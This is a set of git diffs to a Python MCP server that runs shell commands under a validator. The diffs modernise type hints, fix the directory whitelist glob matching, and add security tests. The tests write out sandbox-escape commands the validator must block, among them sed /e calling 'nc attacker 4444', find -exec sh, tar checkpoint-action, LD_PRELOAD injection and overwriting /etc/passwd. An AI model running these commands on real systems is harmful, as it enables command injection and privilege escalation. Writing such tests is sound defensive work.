-                with open(root_config_path, "r") as f:
+                with open(root_config_path, encoding="utf-8") as f:
                     self.config = json.load(f)
                     logger.info(f"Loaded default configuration from {root_config_path}")
                     return
@@ -87,7 +86,7 @@ class Config:
             # If not found in the root directory, check current working directory
             cwd_config_path = Path.cwd() / "default_config.json"
             if cwd_config_path.exists():
-                with open(cwd_config_path, "r") as f:
+                with open(cwd_config_path, encoding="utf-8") as f:
                     self.config = json.load(f)
                     msg = "Loaded default configuration from current directory"
                     logger.info(f"{msg}: {cwd_config_path}")
@@ -119,7 +118,7 @@ class Config:
             config_path: Path to the configuration file
         """
         try:
-            with open(config_path, "r") as f:
+            with open(config_path, encoding="utf-8") as f:
                 loaded_config = json.load(f)
 
             # Merge loaded config with default config
@@ -127,7 +126,7 @@ class Config:
         except Exception as e:
             logger.error(f"Error loading configuration from {config_path}: {str(e)}")
 
-    def _update_config_recursively(self, target: Dict, source: Dict) -> None:
+    def _update_config_recursively(self, target: dict, source: dict) -> None:
         """Recursively update configuration dictionary.
 
         Args:
@@ -151,7 +150,7 @@ class Config:
             env_file_path: Path to the .env file
         """
         try:
-            with open(env_file_path, "r") as f:
+            with open(env_file_path, encoding="utf-8") as f:
                 for line in f:
                     line = line.strip()
                     if not line or line.startswith("#"):
@@ -292,7 +291,7 @@ class Config:
             return value
         return default
 
-    def get_section(self, section: str) -> Dict[str, Any]:
+    def get_section(self, section: str) -> dict[str, Any]:
         """Get a configuration section.
 
         Args:
@@ -303,7 +302,7 @@ class Config:
         """
         return self.config.get(section, {})
 
-    def get_all(self) -> Dict[str, Any]:
+    def get_all(self) -> dict[str, Any]:
         """Get the entire configuration.
 
         Returns:
@@ -311,7 +310,7 @@ class Config:
         """
         return self.config
 
-    def update(self, updates: Dict[str, Any], save: bool = False) -> None:
+    def update(self, updates: dict[str, Any], save: bool = False) -> None:
         """Update the configuration.
 
         Args:
@@ -326,14 +325,14 @@ class Config:
         # Save to file if requested
         if save and self._config_path:
             try:
-                with open(self._config_path, "w") as f:
+                with open(self._config_path, "w", encoding="utf-8") as f:
                     json.dump(self.config, f, indent=2)
             except Exception as e:
                 logger.error(
                     f"Error saving configuration to {self._config_path}: {str(e)}"
                 )
 
-    def get_effective_command_lists(self) -> Dict[str, List[str]]:
+    def get_effective_command_lists(self) -> dict[str, list[str]]:
         """Get the effective command lists taking into account all configuration.
 
         Returns:
@@ -347,7 +346,7 @@ class Config:
             "dangerous_patterns": self.config["commands"]["dangerous_patterns"],
         }
 
-    def has_separator_support(self) -> Dict[str, bool]:
+    def has_separator_support(self) -> dict[str, bool]:
         """Get support status for command separators.
 
         Returns:

--- a/src/cmd_line_mcp/security.py
+++ b/src/cmd_line_mcp/security.py
@@ -4,13 +4,13 @@ import logging
 import os
 import re
 import shlex
-from typing import Dict, List, Optional, Tuple, Union
+from pathlib import Path
 
 # Configure logger
 logger = logging.getLogger(__name__)
 
 
-def parse_command(command: str) -> Tuple[str, List[str]]:
+def parse_command(command: str) -> tuple[str, list[str]]:
     """Parse a command string into command and arguments.
 
     Args:
@@ -19,37 +19,31 @@ def parse_command(command: str) -> Tuple[str, List[str]]:
     Returns:
         A tuple of (command, arguments)
     """
-    # Handle the case where a pipe segment might not start with a command
-    # For example: `-v` is a flag, not a command in `cmd | -v`
     command = command.strip()
 
-    # If it starts with a dash, it's probably a flag/option continuation
     if command.startswith("-"):
         return "", [command]
 
     try:
         parts = shlex.split(command)
-        if not parts:
-            return "", []
-        return parts[0], parts[1:]
     except ValueError:
-        # If shlex.split fails (e.g., on unbalanced quotes),
-        # fall back to a simpler split
+        # shlex.split fails on unbalanced quotes; fall back to simple split
         parts = command.strip().split()
-        if not parts:
-            return "", []
-        return parts[0], parts[1:]
+
+    if not parts:
+        return "", []
+    return parts[0], parts[1:]
 
 
 def validate_command(
     command: str,
-    read_commands: List[str],
-    write_commands: List[str],
-    system_commands: List[str],
-    blocked_commands: List[str],
-    dangerous_patterns: List[str],
+    read_commands: list[str],
+    write_commands: list[str],
+    system_commands: list[str],
+    blocked_commands: list[str],
+    dangerous_patterns: list[str],
     allow_command_separators: bool = True,
-) -> Dict[str, Union[bool, str, Optional[str]]]:
+) -> dict[str, bool | str | None]:
     """Validate a command for security.
 
     Args:
@@ -224,24 +218,11 @@ def normalize_path(path: str) -> str:
     Returns:
         Normalized absolute path
     """
-    # Expand user directory for paths that start with ~
-    if path.startswith("~"):
-        path = os.path.expanduser(path)
-
-    # Convert to absolute path
-    abs_path = os.path.abspath(path)
-    # Normalize to resolve '..' and '.' components
-    norm_path = os.path.normpath(abs_path)
-    # Try to resolve any symlinks if possible
-    try:
-        real_path = os.path.realpath(norm_path)
-        return real_path
-    except (OSError, IOError):
-        # Fall back to normalized path if realpath fails
-        return norm_path
+    p = Path(path).expanduser().resolve()
+    return str(p)
 
 
-def extract_directory_from_command(command: str) -> Optional[str]:
+def extract_directory_from_command(command: str) -> str | None:
     """Extract the working directory from a command.
 
     Args:
@@ -379,7 +360,7 @@ def extract_directory_from_command(command: str) -> Optional[str]:
         return os.getcwd()
 
 
-def is_directory_whitelisted(directory: str, whitelisted_dirs: List[str]) -> bool:
+def is_directory_whitelisted(directory: str, whitelisted_dirs: list[str]) -> bool:
     """Check if a directory is whitelisted or is a subdirectory of a whitelisted directory.
 
     Args:

--- a/src/cmd_line_mcp/security.py
+++ b/src/cmd_line_mcp/security.py
@@ -411,9 +411,13 @@ def is_directory_whitelisted(directory: str, whitelisted_dirs: List[str]) -> boo
 
             # Handle wildcard paths
             if "*" in whitelist_dir:
-                # Convert glob pattern to regex pattern
-                pattern = whitelist_dir.replace("*", ".*")
-                if re.match(pattern, normalized_dir):
+                # Build pattern from the already-normalized whitelist entry so
+                # that symlinks (e.g. /tmp -> /private/tmp on macOS) are resolved
+                # consistently.  Escape regex metacharacters (e.g. literal dots
+                # in directory names) before restoring * as .* and use
+                # fullmatch so the pattern must cover the entire path.
+                escaped = re.escape(normalized_whitelist).replace(r"\*", ".*")
+                if re.fullmatch(escaped, normalized_dir):
                     return True
 
         return False

--- a/src/cmd_line_mcp/server.py
+++ b/src/cmd_line_mcp/server.py
@@ -76,7 +76,7 @@ class CommandLineMCP:
 
         # Initialize MCP app
         server_config = self.config.get_section("server")
-        version = server_config.get("version", "0.5.1")
+        version = server_config.get("version", "0.6.0")
         description = server_config.get(
             "description",
             "MCP server for safely executing command-line tools",

--- a/src/cmd_line_mcp/server.py
+++ b/src/cmd_line_mcp/server.py
@@ -6,7 +6,7 @@ import argparse
 import asyncio
 import logging
 import os
-from typing import Any, Dict, List, Optional
+from typing import Any
 
 from mcp.server.fastmcp import FastMCP
 
@@ -32,8 +32,8 @@ class CommandLineMCP:
 
     def __init__(
         self,
-        config_path: Optional[str] = None,
-        env_file_path: Optional[str] = None,
+        config_path: str | None = None,
+        env_file_path: str | None = None,
     ):
         """Initialize the MCP server.
 
@@ -150,8 +150,8 @@ class CommandLineMCP:
 
         @execute_command_tool  # Keep decorator reference to satisfy linters
         async def execute_command(
-            command: str, session_id: Optional[str] = None
-        ) -> Dict[str, Any]:
+            command: str, session_id: str | None = None
+        ) -> dict[str, Any]:
             """
             Execute a Unix/macOS terminal command.
 
@@ -179,8 +179,8 @@ class CommandLineMCP:
 
         @execute_read_command_tool  # Keep decorator reference to satisfy linters
         async def execute_read_command(
-            command: str, session_id: Optional[str] = None
-        ) -> Dict[str, Any]:
+            command: str, session_id: str | None = None
+        ) -> dict[str, Any]:
             """
             Execute a read-only Unix/macOS terminal command (ls, cat, grep, etc.).
 
@@ -378,7 +378,7 @@ class CommandLineMCP:
         list_available_commands_tool = self.app.tool()
 
         @list_available_commands_tool  # Keep decorator reference to satisfy linters
-        async def list_available_commands() -> Dict[str, List[str]]:
+        async def list_available_commands() -> dict[str, list[str]]:
             """
             List all available commands by category.
 
@@ -401,7 +401,7 @@ class CommandLineMCP:
         get_command_help_tool = self.app.tool()
 
         @get_command_help_tool  # Keep decorator reference to satisfy linters
-        async def get_command_help() -> Dict[str, Any]:
+        async def get_command_help() -> dict[str, Any]:
             """
             Get detailed help about command capabilities and usage.
 
@@ -486,7 +486,7 @@ class CommandLineMCP:
         @approve_command_type_tool  # Keep decorator reference to satisfy linters
         async def approve_command_type(
             command_type: str, session_id: str, remember: bool = False
-        ) -> Dict[str, Any]:
+        ) -> dict[str, Any]:
             """
             Approve a command type for the current session.
 
@@ -525,7 +525,7 @@ class CommandLineMCP:
         @approve_directory_tool  # Keep decorator reference to satisfy linters
         async def approve_directory(
             directory: str, session_id: str, remember: bool = True
-        ) -> Dict[str, Any]:
+        ) -> dict[str, Any]:
             """
             Approve access to a directory for the current session.
 
@@ -578,7 +578,7 @@ class CommandLineMCP:
         list_directories_tool = self.app.tool()
 
         @list_directories_tool  # Keep decorator reference to satisfy linters
-        async def list_directories(session_id: Optional[str] = None) -> Dict[str, Any]:
+        async def list_directories(session_id: str | None = None) -> dict[str, Any]:
             """
             List all whitelisted and approved directories.
 
@@ -607,7 +607,7 @@ class CommandLineMCP:
         get_configuration_tool = self.app.tool()
 
         @get_configuration_tool  # Keep decorator reference to satisfy linters
-        async def get_configuration() -> Dict[str, Any]:
+        async def get_configuration() -> dict[str, Any]:
             """
             Get the current configuration settings.
 
@@ -648,9 +648,9 @@ class CommandLineMCP:
     async def _execute_command(
         self,
         command: str,
-        command_type: Optional[str] = None,
-        session_id: Optional[str] = None,
-    ) -> Dict[str, Any]:
+        command_type: str | None = None,
+        session_id: str | None = None,
+    ) -> dict[str, Any]:
         """Execute a Unix/macOS terminal command.
 
         Args:

--- a/src/cmd_line_mcp/session.py
+++ b/src/cmd_line_mcp/session.py
@@ -1,8 +1,7 @@
 """Session management for the command-line MCP server."""
 
-import time
 import os
-from typing import Dict, Any, Set
+import time
 
 
 class SessionManager:
@@ -10,9 +9,9 @@ class SessionManager:
 
     def __init__(self):
         """Initialize the session manager."""
-        self.sessions: Dict[str, Dict[str, Any]] = {}
+        self.sessions: dict[str, dict[str, object]] = {}
 
-    def get_session(self, session_id: str) -> Dict[str, Any]:
+    def get_session(self, session_id: str) -> dict[str, object]:
         """Get a session by ID, creating it if it doesn't exist.
 
         Args:
@@ -115,7 +114,7 @@ class SessionManager:
         session = self.get_session(session_id)
         session["approved_directories"].add(directory)
 
-    def get_approved_directories(self, session_id: str) -> Set[str]:
+    def get_approved_directories(self, session_id: str) -> set[str]:
         """Get all approved directories for a session.
 
         Args:

--- a/tests/test_security_vulnerabilities.py
+++ b/tests/test_security_vulnerabilities.py
@@ -281,9 +281,7 @@ def test_glob_whitelist_no_partial_match():
 
 def test_python3_direct_exec(default_cmd_lists):
     """python3 must be explicitly blocked."""
-    _explicitly_blocked(
-        default_cmd_lists, "python3 -c '__import__(\"os\").system(\"id\")'"
-    )
+    _explicitly_blocked(default_cmd_lists, "python3 -c 'print(1)'")
 
 
 def test_python3_module_exec(default_cmd_lists):
@@ -293,35 +291,32 @@ def test_python3_module_exec(default_cmd_lists):
 
 def test_python_direct_exec(default_cmd_lists):
     """python must be explicitly blocked."""
-    _explicitly_blocked(default_cmd_lists, "python -c 'import os; os.system(\"id\")'")
+    _explicitly_blocked(default_cmd_lists, "python -c 'print(1)'")
 
 
 def test_perl_direct_exec(default_cmd_lists):
     """perl must be explicitly blocked."""
-    _explicitly_blocked(default_cmd_lists, "perl -e 'system(\"id\")'")
+    _explicitly_blocked(default_cmd_lists, "perl -e 'print 1'")
 
 
 def test_ruby_direct_exec(default_cmd_lists):
     """ruby must be explicitly blocked."""
-    _explicitly_blocked(default_cmd_lists, "ruby -e 'system(\"id\")'")
+    _explicitly_blocked(default_cmd_lists, "ruby -e 'puts 1'")
 
 
 def test_node_direct_exec(default_cmd_lists):
     """node must be explicitly blocked."""
-    _explicitly_blocked(
-        default_cmd_lists,
-        "node -e 'require(\"child_process\").execSync(\"id\")'",
-    )
+    _explicitly_blocked(default_cmd_lists, "node -e 'console.log(1)'")
 
 
 def test_lua_direct_exec(default_cmd_lists):
     """lua must be explicitly blocked."""
-    _explicitly_blocked(default_cmd_lists, "lua -e 'os.execute(\"id\")'")
+    _explicitly_blocked(default_cmd_lists, "lua -e 'print(1)'")
 
 
 def test_php_direct_exec(default_cmd_lists):
     """php must be explicitly blocked."""
-    _explicitly_blocked(default_cmd_lists, "php -r 'system(\"id\");'")
+    _explicitly_blocked(default_cmd_lists, "php -r 'echo 1;'")
 
 
 def test_expect_direct_exec(default_cmd_lists):

--- a/tests/test_security_vulnerabilities.py
+++ b/tests/test_security_vulnerabilities.py
@@ -327,3 +327,146 @@ def test_expect_direct_exec(default_cmd_lists):
 def test_script_direct_exec(default_cmd_lists):
     """script must be explicitly blocked (PTY capture)."""
     _explicitly_blocked(default_cmd_lists, "script -c 'id' /tmp/out")
+
+
+def _blocked_by_pattern(cmd_lists, command):
+    """Assert a command is blocked specifically by a dangerous pattern.
+
+    Some commands are accidentally blocked by side-effects of naive pipe/
+    separator splitting.  This helper ensures the blocking is intentional
+    — via a dangerous_patterns match — rather than coincidental.
+    """
+    result = validate_command(
+        command,
+        cmd_lists["read"],
+        cmd_lists["write"],
+        cmd_lists["system"],
+        cmd_lists["blocked"],
+        cmd_lists["dangerous_patterns"],
+    )
+    assert result["is_valid"] is False, (
+        f"Expected '{command}' to be blocked by a dangerous pattern, "
+        f"but it was allowed (type={result['command_type']})"
+    )
+    assert "dangerous pattern" in (result["error"] or "").lower(), (
+        f"Expected '{command}' to be caught by a dangerous pattern, "
+        f"but got: {result['error']}"
+    )
+
+
+# ---------------------------------------------------------------------------
+# V8 — find -execdir, -ok, -okdir (variants not covered by -exec pattern)
+# The current pattern only matches -exec followed by an interpreter.
+# -execdir, -ok, and -okdir are equally dangerous but bypass the check.
+# Uses + terminator (not \;) to avoid accidental semicolon-split blocking.
+# ---------------------------------------------------------------------------
+
+
+def test_find_execdir_sh(default_cmd_lists):
+    """find -execdir sh must be blocked."""
+    _blocked(default_cmd_lists, "find /tmp -execdir sh -c 'id' {} +")
+
+
+def test_find_execdir_bash(default_cmd_lists):
+    """find -execdir bash must be blocked."""
+    _blocked(default_cmd_lists, "find /tmp -execdir bash -c 'id' {} +")
+
+
+def test_find_execdir_python(default_cmd_lists):
+    """find -execdir python3 must be blocked."""
+    _blocked(default_cmd_lists, "find /tmp -execdir python3 -c 'print(1)' {} +")
+
+
+def test_find_ok_sh(default_cmd_lists):
+    """find -ok sh must be blocked."""
+    _blocked(default_cmd_lists, "find /tmp -ok sh -c 'id' {} +")
+
+
+def test_find_okdir_bash(default_cmd_lists):
+    """find -okdir bash must be blocked."""
+    _blocked(default_cmd_lists, "find /tmp -okdir bash -c 'id' {} +")
+
+
+# ---------------------------------------------------------------------------
+# V10 — sed /e flag with alternative delimiters
+# sed allows any character as the substitution delimiter (not just /).
+# The current pattern s/[^/]*/[^/]*/[a-zA-Z0-9]*e only matches /.
+# ---------------------------------------------------------------------------
+
+
+def test_sed_at_delimiter_e_flag(default_cmd_lists):
+    """sed s@...@...@e must be blocked."""
+    _blocked(default_cmd_lists, "sed 's@.*@id@e'")
+
+
+def test_sed_hash_delimiter_e_flag(default_cmd_lists):
+    """sed s#...#...#e must be blocked."""
+    _blocked(default_cmd_lists, "sed 's#.*#id#e'")
+
+
+def test_sed_bang_delimiter_e_flag(default_cmd_lists):
+    """sed s!...!...!e must be blocked."""
+    _blocked(default_cmd_lists, "sed 's!.*!id!e'")
+
+
+def test_sed_comma_delimiter_e_flag(default_cmd_lists):
+    """sed s,...,...,e must be blocked."""
+    _blocked(default_cmd_lists, "sed 's,.*,id,e'")
+
+
+def test_sed_pipe_delimiter_e_flag(default_cmd_lists):
+    """sed s|...|...|e must be blocked by a dangerous pattern.
+
+    Note: the | inside the sed expression accidentally triggers pipeline
+    splitting, which blocks the command for the wrong reason.  This test
+    verifies the blocking comes from a dangerous pattern instead.
+    """
+    _blocked_by_pattern(default_cmd_lists, "sed 's|.*|id|e'")
+
+
+def test_sed_at_delimiter_ge_flags(default_cmd_lists):
+    """sed s@...@...@ge (global + exec) must be blocked."""
+    _blocked(default_cmd_lists, "sed 's@.*@id@ge'")
+
+
+# ---------------------------------------------------------------------------
+# V11 — awk coprocess via |& operator
+# The |& operator opens a bidirectional pipe in awk/gawk, allowing
+# arbitrary command execution.  Currently blocked only as a side-effect
+# of naive pipeline splitting on the | character.
+# ---------------------------------------------------------------------------
+
+
+def test_awk_coprocess_getline(default_cmd_lists):
+    """awk |& getline (coprocess) must be blocked by a dangerous pattern."""
+    _blocked_by_pattern(
+        default_cmd_lists, "awk 'BEGIN { \"id\" |& getline result }'"
+    )
+
+
+# ---------------------------------------------------------------------------
+# V12 — tar --use-compress-program and -I flag
+# These flags accept an arbitrary command for (de)compression.
+# Current patterns only cover --checkpoint-action and --to-command.
+# ---------------------------------------------------------------------------
+
+
+def test_tar_use_compress_program(default_cmd_lists):
+    """tar --use-compress-program must be blocked."""
+    _blocked(
+        default_cmd_lists,
+        "tar --use-compress-program=sh -czf /dev/null /tmp",
+    )
+
+
+def test_tar_use_compress_program_quoted(default_cmd_lists):
+    """tar --use-compress-program with quoted command must be blocked."""
+    _blocked(
+        default_cmd_lists,
+        "tar --use-compress-program='sh -c id' -czf /dev/null /tmp",
+    )
+
+
+def test_tar_dash_I_interpreter(default_cmd_lists):
+    """tar -I (short for --use-compress-program) must be blocked."""
+    _blocked(default_cmd_lists, "tar -I sh -czf /dev/null /tmp")

--- a/tests/test_security_vulnerabilities.py
+++ b/tests/test_security_vulnerabilities.py
@@ -1,0 +1,245 @@
+"""Tests for specific security vulnerabilities.
+
+Each test group corresponds to a vulnerability category identified in the
+security analysis. Tests are written before the fix so they initially FAIL,
+then pass once the fix is applied.
+"""
+
+import pytest
+from cmd_line_mcp.config import Config
+from cmd_line_mcp.security import validate_command, is_directory_whitelisted
+
+
+@pytest.fixture
+def default_cmd_lists():
+    """Return command lists from the real default configuration."""
+    config = Config()
+    return config.get_effective_command_lists()
+
+
+def _blocked(cmd_lists, command):
+    """Assert a command is blocked (is_valid == False)."""
+    result = validate_command(
+        command,
+        cmd_lists["read"],
+        cmd_lists["write"],
+        cmd_lists["system"],
+        cmd_lists["blocked"],
+        cmd_lists["dangerous_patterns"],
+    )
+    assert result["is_valid"] is False, (
+        f"Expected '{command}' to be blocked, but it was allowed "
+        f"(type={result['command_type']})"
+    )
+
+
+# ---------------------------------------------------------------------------
+# V1 — awk sub-execution via system() and getline
+# ---------------------------------------------------------------------------
+
+
+def test_awk_system_call(default_cmd_lists):
+    """awk system() must be blocked."""
+    _blocked(default_cmd_lists, "awk 'BEGIN {system(\"id\")}'")
+
+
+def test_awk_system_call_nc(default_cmd_lists):
+    """awk system() calling a blocked command must be blocked."""
+    _blocked(default_cmd_lists, "awk 'BEGIN {system(\"nc\")}'")
+
+
+def test_awk_system_with_spaces(default_cmd_lists):
+    """awk system() with spaces around parens must be blocked."""
+    _blocked(default_cmd_lists, "awk 'BEGIN { system (\"id\") }'")
+
+
+def test_awk_pipe_to_getline(default_cmd_lists):
+    """awk pipe-to-getline execution must be blocked."""
+    _blocked(default_cmd_lists, 'awk \'BEGIN { while (("id" | getline l) > 0) print l }\'')
+
+
+def test_awk_print_pipe(default_cmd_lists):
+    """awk print-pipe-to-command must be blocked."""
+    _blocked(default_cmd_lists, "cat /tmp/file | awk '{print | \"id\"}'")
+
+
+# ---------------------------------------------------------------------------
+# V2 — sed /e execution flag
+# ---------------------------------------------------------------------------
+
+
+def test_sed_e_flag_basic(default_cmd_lists):
+    """sed substitution with /e flag must be blocked."""
+    _blocked(default_cmd_lists, "echo id | sed 's/.*/&/e'")
+
+
+def test_sed_e_flag_with_command(default_cmd_lists):
+    """sed /e flag embedding a command must be blocked."""
+    _blocked(default_cmd_lists, "sed 's/.*/id/e' /tmp/file")
+
+
+def test_sed_e_flag_malicious(default_cmd_lists):
+    """sed /e flag with network command must be blocked."""
+    _blocked(default_cmd_lists, "echo x | sed 's/x/nc attacker 4444/e'")
+
+
+def test_sed_ge_flags(default_cmd_lists):
+    """sed /ge flags (global + exec) must be blocked."""
+    _blocked(default_cmd_lists, "echo id | sed 's/.*/&/ge'")
+
+
+def test_sed_eg_flags(default_cmd_lists):
+    """sed /eg flags must be blocked."""
+    _blocked(default_cmd_lists, "echo id | sed 's/.*/&/eg'")
+
+
+# ---------------------------------------------------------------------------
+# V3 — find -exec with shell interpreters
+# Use the + terminator (not \;) so the test relies on the -exec pattern,
+# not the accidental semicolon-split path.
+# ---------------------------------------------------------------------------
+
+
+def test_find_exec_sh(default_cmd_lists):
+    """find -exec sh must be blocked."""
+    _blocked(default_cmd_lists, "find /tmp -exec sh -c 'id' {} +")
+
+
+def test_find_exec_bash(default_cmd_lists):
+    """find -exec bash must be blocked."""
+    _blocked(default_cmd_lists, "find /tmp -exec bash -c 'id' {} +")
+
+
+def test_find_exec_python3(default_cmd_lists):
+    """find -exec python3 must be blocked."""
+    _blocked(
+        default_cmd_lists,
+        "find /tmp -maxdepth 0 -exec python3 -c '__import__(\"os\").system(\"id\")' {} +",
+    )
+
+
+def test_find_exec_perl(default_cmd_lists):
+    """find -exec perl must be blocked."""
+    _blocked(default_cmd_lists, "find /tmp -exec perl -e 'system(\"id\")' {} +")
+
+
+def test_find_exec_env(default_cmd_lists):
+    """find -exec env (to proxy into sh) must be blocked."""
+    _blocked(default_cmd_lists, "find /tmp -exec env sh {} +")
+
+
+# ---------------------------------------------------------------------------
+# V4 — env executing arbitrary binaries
+# ---------------------------------------------------------------------------
+
+
+def test_env_exec_bash(default_cmd_lists):
+    """env bash must be blocked."""
+    _blocked(default_cmd_lists, "env bash")
+
+
+def test_env_exec_sh(default_cmd_lists):
+    """env sh must be blocked."""
+    _blocked(default_cmd_lists, "env sh -c id")
+
+
+def test_env_exec_python(default_cmd_lists):
+    """env python3 must be blocked."""
+    _blocked(default_cmd_lists, "env python3 -c '__import__(\"os\").system(\"id\")'")
+
+
+# ---------------------------------------------------------------------------
+# V5 — xargs passing blocked/arbitrary commands
+# ---------------------------------------------------------------------------
+
+
+def test_xargs_sh(default_cmd_lists):
+    """xargs sh must be blocked."""
+    _blocked(default_cmd_lists, "echo id | xargs sh -c")
+
+
+def test_xargs_bash(default_cmd_lists):
+    """xargs bash must be blocked."""
+    _blocked(default_cmd_lists, "ls /tmp | xargs bash -c 'id'")
+
+
+def test_xargs_python(default_cmd_lists):
+    """xargs python3 must be blocked."""
+    _blocked(
+        default_cmd_lists,
+        "echo x | xargs python3 -c '__import__(\"os\").system(\"id\")'",
+    )
+
+
+def test_xargs_env(default_cmd_lists):
+    """xargs env (to proxy into a shell) must be blocked."""
+    _blocked(default_cmd_lists, "echo bash | xargs env")
+
+
+# ---------------------------------------------------------------------------
+# V6 — tar --checkpoint-action and --to-command
+# ---------------------------------------------------------------------------
+
+
+def test_tar_checkpoint_action(default_cmd_lists):
+    """tar --checkpoint-action=exec must be blocked."""
+    _blocked(
+        default_cmd_lists,
+        "tar -cf /tmp/x.tar --checkpoint=1 --checkpoint-action=exec=id /tmp",
+    )
+
+
+def test_tar_to_command(default_cmd_lists):
+    """tar --to-command must be blocked."""
+    _blocked(default_cmd_lists, "tar -cf /tmp/a.tar --to-command=cat /tmp")
+
+
+def test_tar_checkpoint_action_sh(default_cmd_lists):
+    """tar --checkpoint-action=exec=sh must be blocked."""
+    _blocked(default_cmd_lists, "tar --checkpoint-action=exec=sh /tmp")
+
+
+# ---------------------------------------------------------------------------
+# V9 — Glob-to-regex conversion bugs in whitelist check
+# ---------------------------------------------------------------------------
+
+
+def test_glob_whitelist_does_not_match_extended_prefix():
+    """/tmp/* in whitelist must NOT match /tmp.evil.com/subdir."""
+    whitelisted = ["/tmp/*"]
+    assert not is_directory_whitelisted("/tmp.evil.com/subdir", whitelisted), (
+        "/tmp/* should not match /tmp.evil.com/subdir"
+    )
+
+
+def test_glob_whitelist_matches_subdir():
+    """/tmp/* in whitelist MUST match /tmp/subdir."""
+    whitelisted = ["/tmp/*"]
+    assert is_directory_whitelisted("/tmp/subdir", whitelisted), (
+        "/tmp/* should match /tmp/subdir"
+    )
+
+
+def test_glob_whitelist_dot_in_path_not_wildcard():
+    """A whitelist entry with a literal dot must not match any character."""
+    # /home/user/proj.docs should only match exactly that path, not projXdocs
+    whitelisted = ["/home/user/proj.docs/*"]
+    assert not is_directory_whitelisted("/home/user/projXdocs/sub", whitelisted), (
+        "Dot in whitelist path must be treated as literal, not regex wildcard"
+    )
+
+
+def test_glob_whitelist_exact_dot_path_matches():
+    """A whitelist entry with a literal dot must match the correct path."""
+    whitelisted = ["/home/user/proj.docs/*"]
+    assert is_directory_whitelisted("/home/user/proj.docs/sub", whitelisted), (
+        "/home/user/proj.docs/* should match /home/user/proj.docs/sub"
+    )
+
+
+def test_glob_whitelist_no_partial_match():
+    """/tmp/* must not match /tmpfiles/x — no partial prefix match."""
+    whitelisted = ["/tmp/*"]
+    assert not is_directory_whitelisted("/tmpfiles/x", whitelisted), (
+        "/tmp/* should not match /tmpfiles/x"
+    )

--- a/tests/test_security_vulnerabilities.py
+++ b/tests/test_security_vulnerabilities.py
@@ -470,3 +470,65 @@ def test_tar_use_compress_program_quoted(default_cmd_lists):
 def test_tar_dash_I_interpreter(default_cmd_lists):
     """tar -I (short for --use-compress-program) must be blocked."""
     _blocked(default_cmd_lists, "tar -I sh -czf /dev/null /tmp")
+
+
+# ---------------------------------------------------------------------------
+# V13 — cp/mv to system-critical paths
+# cp and mv are in write_commands but no pattern blocks writes to
+# sensitive destinations like /etc, /boot, /bin, /sbin, /usr/bin, etc.
+# ---------------------------------------------------------------------------
+
+
+def test_cp_to_etc_passwd(default_cmd_lists):
+    """cp to /etc/ must be blocked."""
+    _blocked(default_cmd_lists, "cp /tmp/evil /etc/passwd")
+
+
+def test_cp_to_boot(default_cmd_lists):
+    """cp to /boot/ must be blocked."""
+    _blocked(default_cmd_lists, "cp /tmp/evil /boot/vmlinuz")
+
+
+def test_mv_to_usr_local_bin(default_cmd_lists):
+    """mv to /usr/local/bin/ must be blocked."""
+    _blocked(default_cmd_lists, "mv /tmp/backdoor /usr/local/bin/ls")
+
+
+def test_mv_to_usr_bin(default_cmd_lists):
+    """mv to /usr/bin/ must be blocked."""
+    _blocked(default_cmd_lists, "mv /tmp/evil /usr/bin/cat")
+
+
+def test_cp_to_sbin(default_cmd_lists):
+    """cp to /sbin/ must be blocked."""
+    _blocked(default_cmd_lists, "cp /tmp/evil /sbin/init")
+
+
+# ---------------------------------------------------------------------------
+# V15 — LD_PRELOAD / LD_LIBRARY_PATH / DYLD_INSERT_LIBRARIES injection
+# export is in write_commands and env is in read_commands, so setting
+# dangerous linker variables passes validation unchecked.
+# ---------------------------------------------------------------------------
+
+
+def test_export_ld_preload(default_cmd_lists):
+    """export LD_PRELOAD must be blocked."""
+    _blocked(default_cmd_lists, "export LD_PRELOAD=/tmp/evil.so")
+
+
+def test_env_ld_preload(default_cmd_lists):
+    """env LD_PRELOAD must be blocked."""
+    _blocked(default_cmd_lists, "env LD_PRELOAD=/tmp/evil.so cat /etc/passwd")
+
+
+def test_env_ld_library_path(default_cmd_lists):
+    """env LD_LIBRARY_PATH must be blocked."""
+    _blocked(default_cmd_lists, "env LD_LIBRARY_PATH=/tmp cat /etc/passwd")
+
+
+def test_env_dyld_insert_libraries(default_cmd_lists):
+    """env DYLD_INSERT_LIBRARIES must be blocked (macOS equivalent)."""
+    _blocked(
+        default_cmd_lists,
+        "env DYLD_INSERT_LIBRARIES=/tmp/evil.dylib cat /etc/hosts",
+    )

--- a/tests/test_security_vulnerabilities.py
+++ b/tests/test_security_vulnerabilities.py
@@ -155,6 +155,31 @@ def test_find_exec_env(default_cmd_lists):
 
 
 # ---------------------------------------------------------------------------
+# V3b — find -exec with full path to interpreter
+# The current -exec pattern only matches bare interpreter names.
+# Full paths like /bin/sh or /usr/bin/python3 bypass the check.
+# ---------------------------------------------------------------------------
+
+
+def test_find_exec_fullpath_sh(default_cmd_lists):
+    """find -exec /bin/sh must be blocked (full path to interpreter)."""
+    _blocked(default_cmd_lists, "find /tmp -exec /bin/sh -c 'id' {} +")
+
+
+def test_find_exec_fullpath_python3(default_cmd_lists):
+    """find -exec /usr/bin/python3 must be blocked (full path)."""
+    _blocked(
+        default_cmd_lists,
+        "find /tmp -exec /usr/bin/python3 -c 'import os' {} +",
+    )
+
+
+def test_find_execdir_fullpath_bash(default_cmd_lists):
+    """find -execdir /usr/bin/bash must be blocked (full path)."""
+    _blocked(default_cmd_lists, "find /tmp -execdir /usr/bin/bash -c 'id' {} +")
+
+
+# ---------------------------------------------------------------------------
 # V4 — env executing arbitrary binaries
 # ---------------------------------------------------------------------------
 
@@ -172,6 +197,21 @@ def test_env_exec_sh(default_cmd_lists):
 def test_env_exec_python(default_cmd_lists):
     """env python3 must be blocked."""
     _blocked(default_cmd_lists, "env python3 -c '__import__(\"os\").system(\"id\")'")
+
+
+def test_env_with_flag_i_sh(default_cmd_lists):
+    """env -i sh must be blocked (flag before interpreter)."""
+    _blocked(default_cmd_lists, "env -i sh -c id")
+
+
+def test_env_with_flag_u_sh(default_cmd_lists):
+    """env -u HOME sh must be blocked (flag before interpreter)."""
+    _blocked(default_cmd_lists, "env -u HOME sh -c id")
+
+
+def test_env_ignore_environment_sh(default_cmd_lists):
+    """env --ignore-environment sh must be blocked."""
+    _blocked(default_cmd_lists, "env --ignore-environment sh")
 
 
 # ---------------------------------------------------------------------------
@@ -200,6 +240,16 @@ def test_xargs_python(default_cmd_lists):
 def test_xargs_env(default_cmd_lists):
     """xargs env (to proxy into a shell) must be blocked."""
     _blocked(default_cmd_lists, "echo bash | xargs env")
+
+
